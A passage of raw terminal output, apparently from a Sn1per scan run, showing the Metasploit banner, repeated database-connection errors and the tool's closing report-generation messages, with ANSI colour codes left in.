1924%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
1925[0m
1926
1927 =[ [33mmetasploit v5.0.50-dev[0m ]
1928+ -- --=[ 1928 exploits - 1077 auxiliary - 332 post ]
1929+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
1930+ -- --=[ 7 evasion ]
1931
1932[0m[1m[31m[-][0m Database not connected
1933[0m[1m[31m[-][0m Database not connected
1934[0m[1m[31m[-][0m Database not connected
1935[0m[1m[31m[-][0m Database not connected
1936[0m[1m[31m[-][0m Database not connected
1937[0m[93m + -- --=[Generating reports...[0m
1938[92m[[94m[92m][0m
1939[93m + -- --=[Sorting all domains...[0m
1940[93m + -- --=[Removing blank screenshots...[0m
1941[91m + -- --=[Sn1per Professional is not installed. To download Sn1per Professional, go to https://xerosecurity.com. [0m
1942[93m + -- --=[Done![0m